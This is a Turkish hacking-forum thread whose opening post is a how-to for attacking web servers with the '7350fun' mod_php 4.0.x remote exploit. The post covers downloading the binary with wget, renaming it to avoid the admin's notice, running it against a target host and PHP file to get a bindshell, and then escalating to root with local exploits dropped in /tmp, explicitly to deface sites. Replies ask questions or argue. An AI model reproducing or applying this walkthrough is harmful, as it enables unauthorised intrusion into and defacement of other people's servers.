Php 4.0.2-4.0.7 Remote Sploit By Moliver

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    MoLiVeR
    MoLiVeR's avatar
    Erkek

biraz *nix ağırlıklı hacking için annatayım dedim ..

Kullancağımız araçlar püsürler :

shell account veya linux b0x

------------------------------

shellimze yada b0xımızla ilk login oluyoruz daha sonra

wget http://www.packetstormsecurity.org/removed/7350fun

eğer shell kullnıyorsanız root çakmasın diye mv 7350fun ttx yada farklı bir dosya ismine çevirin sadece bir önlem tabi

daha sonra chmod +x ttx neden böle yaptık binary file bu gerekli chmodu verdik çalışsın diye ...

./ttx deyince sploitniiz çalışır

ver karşınıza sploitin konsolu çıkar :

7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7RC2 remote exploit
    by lorian.

usage: ./ttx [options] <hostname> <phpfile>

Options:
      -c            check exploitability only, do not exploit
      -n            no check mode
      -s start      bruteforce start (top)
      -t target     choose target
                    (1) PHP v4.0.2rc1-v4.0.5
                    (2) PHP v4.0.6-v4.0.7RC2
    ./ttx -t target host  /php dosyasi

şimdi target ksımıına php versionuna göre 1 veya 2 diyoruz

daha sonra hostu yazıyoruz ve php dosyasının yerini belirtiyoruz

örn :

./ttx -t 1 www.ornek.com /forum/index.php

gibi yapıyorux sonra okeyliyoruz [bfffad3] ++++ gibi tarmaya başlar biraz uzun sürer bu bekliceksiniz daha sonra işlem bitince

komut satırı

kısmı gelcek bi dir yada ls -al çekerseniz dosyaları listelicek size bindshell dediğimiz olayı hazırlamış oluyor ...

daha sonra idnizi 0 yapmak lazım root yetkisi yani bir local sploit bulun genellikle bu tip sistemlere girerseniz eski olur o yüzden ptrace-kmod hatarihanzo gibi sploitler root almak için yeterli olur ..

local exploiterliniz tmp içine atın çünkü yazıdrma yetkisi bi orda var

eğre dosyayaı çekerken wget yemesse ftp ile çekin olda olmassa lynx -dump file diye çekin oda olmassa kodu alınnn pico amele diye kaydedin

biraz linux bilginiz olursa zaten annarsınız...

kolay gelsin ii defaceler ..

----------------- Powered BY CTR TEAM -------------------

Yazan : MoLiVeR Yardımım dokunduysa ne mutlu bana

bunu başka sitelerde kullanırken lütfen yazarın ismini felam yazın tittirmeyin belanızı :P

Ir4DeX Security Group 2007
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    sorcerer
    sorcerer's avatar
    Üstün Hizmet Madalyası Üstün Hizmet Madalyası
    Erkek
    Bu İş Nasıl Yapılır Anlamadım Gitti bi Türlü... Bunu  Yapınca Siten yi Hacklemiş mi oLuyoruz Nasıl oLuyor..  Biraz Daha Amatörce Anlatırmısın Biz Siz Gibi Bilmiyoz Bu işLeri Öğrenelim aqa :)

Coco cola gibiyim hayatın tadıyım, rocco gibiyim çok şekerim, albeniyim bahanem çok, çikolatalı gofretim beni sevmeyen yok!...
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    RhiFaT
    RhiFaT's avatar
    Erkek
    arkadaş bu php sürümleri için exploit bununla sistem de  root oluyosun

işte öyle
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    zemin
    zemin's avatar
    Erkek
    Güzel anlatmış arkadaş zaten...
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Night_Wolf
    Night_Wolf's avatar
    Erkek
    bindshell olayı ne demek?

May the force be with you!!
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ekselans
    ekselans's avatar
    Erkek
    ya dostum çok sazansınız yaw yk sade dille anlat falan demeyin bu adamlar zaten bilseler kendileri yaparlar bir ikinciside kendi bilmiyor ki basitini gidiyor başak siteden kopyala yapıştır yapıyor sonra buraya getirip ahkam kesiyor soru sorsan bilemez eminm yarın sölim der araştırı falan sonra tekrar kopyala yapıştır sana yollar ben tanımam bunları benim evimde 4 yıldır internet var anlata biliyor muyum zaten bu işi bilen adamınburda ne işi var değil mi?

sen bilseydin burda olur muydun kekır değil de hacker olsaydın  site güzel adamlar güzel yre değin miş ce ekmeklerini yiyorlar ve o yüzden hacker belki nlar olabilir ama ötekiler asla olmazlar zaten yok şu programı kullan yok bunu kullan fallan adları nerden ezberliyorlarsa artık işte kendilerini eolarını tatmin ediyorlsar bu şekilde hack dediğin adm zaten kendi yazar kendi yapar boş verin siz bunları program simi ezberleyeceğine biraz dil örenseniz belki bir şeyler yapatsınız benden tavsiye bu tüe adamalra da nasıl yapıyorsunuz demekten vazgeçin salak durumuna düşürmeyin kendinizi işte ben burdayım madem öle hacklesinler benide görem adminler hariç onlar yapabilirler birşey demem neyse hade bakam....kendinize ii bakın güzel bir site güzel bilgile vriyor herkesin emeğine tşkler sağlıcakla kalın!!!!!!!!!

[url=www.nevruzbaba.com][img]http://img467.imageshack.us/img467/5941/nevruzbaba4hw.jpg[/img][/url] [size=18][color=darkred]Nevruzbaba.com Dünya Türk Kulübü Açıldı[/color][/size]VATAN:::::......________________www.nevruzbaba.com
Toplam Hit: 2485 Toplam Mesaj: 6